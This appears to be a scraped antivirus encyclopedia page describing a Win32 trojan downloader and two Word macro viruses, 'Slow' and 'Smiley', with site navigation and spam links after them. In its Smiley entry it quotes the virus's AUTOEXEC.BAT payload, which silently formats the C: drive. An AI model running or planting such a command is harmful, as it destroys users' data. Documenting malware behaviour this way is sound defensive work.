TrojanDownloader.Win32.Dler.11.a
Description TrojanDownloader.Win32.Dler.11.a
When run, the Trojan installs itself to the system. While installing, the program downloads Trojans from a remote hacker's site and runs them. Optionally, it can install downloaded Trojans in the Windows registry to start automatically. The installed Trojan file name, the target directory and registry key are are stored in encrypted form in a Trojan file at the file end. A hacker may configure them before sending a Trojan to a victim's machine or before placing them on a Web site or mass-mailing the Trojan.
Check other viruses! Be aware! Use Antiviral Software
Macro.Word.Slow
Description Macro.Word.Slow
This is a harmless polymorphic macro virus. It contains only one macro AutoClose and infects the global macros area and documents on Close call. On each infection the virus' polymorphic engine renames internal virus variables to other random selected names with random selected lengths. As a result there are no constant search strings to detect the virus.
Macro.Word.Smiley
Description Macro.Word.Smiley
This is an encrypted Word macro virus. It contains 8 macros in both NORMAL.DOT and infected files: Timer, AutoExec, AutoExit, AutoOpen, DateiSpeichern, DateiSpeichernUnter, DateiDrucken, DateiDruckenStandard
On AutoOpen the virus infects the system, on saving a file (DateiSpeichern, DateiSpeichernUnter) the virus infects it. On AutoExec the virus creates the parameter "Smiley=" in WIN.INI file in [windows] section, and writes current date to there. On each start the virus checks that parameter, and on 14th day after infection sets new values for menu Tools/Options/UserInfo: Name: Smiley Corporation Initials: SC Address: Greenpeace
These data then will be written to any document while editing. The virus deletes menu items if they exist: Datei/Makroall Datei/Dokumentvorlage... Ansicht/Symbolleisten... Extras/Anpassen...
On 56th day the virus overwrites C:AUTOEXEC.BAT with the text that on execution will display the messages and format the hard drive: @ECHO OFF CLS ECHO Achtung !!! Stoppt alle Atomversuche !!! Atomversuche bedeuten unseren sicheren Tod !!! ECHO Achtung !!! Stoppt die Abholzung der Tropenwälder !!! Kauft nie Gegenstände aus Tropenholz !!! ECHO Achtung !!! Stoppt den Treibhauseffekt !!! Er führt zu einer tödlichen Klimaveränderung !!! ECHO. ECHO (C) Smiley Corporation ECHO. ECHO !!! ABER JETZT IST ES ZU SPÄT !!! ECHO. CTTY NUL C:DOSFORMAT.COM C: /U /AUTOTEST C:WINDOWSCOMMANDFORMAT.COM C: /U /AUTOTEST
On 28th day the virus activates its Timer macro and calls it once per minute. On each call this macro creates the Toolbar button "Smiley" that displays one of the texts: ACHTUNG !!! STOPPT ALLE ATOMVERSUCHE !!! ATOMVERSUCHE BEDEUTEN UNSEREN SICHEREN TOD !!! ACHTUNG !!! STOPPT DIE ABHOLZUNG DER TROPENWÄlDER !!! KAUFT NIE GEGENSTÄNDE AUS TROPENHOLZ !!! ACHTUNG !!! STOPPT DEN TREIBHAUSEFFEKT !!! ER FÜHRT ZU EINER TÖDLICHEN KLIMAVERÄNDERUNG !!!
On AutoExit the virus displays the text: Achtung !!! Stoppt alle Atomversuche !!! Atomversuche bedeuten unseren sicheren Tod !!! Achtung !!! Stoppt die Abholzung der Tropenwälder !!! Kauft nie Gegenstände aus Tropenholz !!! Achtung !!! Stoppt den Treibhauseffekt !!! Er führt zu einer tödlichen Klimaveränderung !!! © Smiley Corporation On printing (DateiSpeichern and DateiDruckenStandard) the virus adds the same text to the end of document.
|
Home
Viruses from A to Z 0-9
A
B
Ñ
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
Bokföring Www.door-hangers-direct.com Funny Jokes Monster High Dolls Av Cart With Wheels
|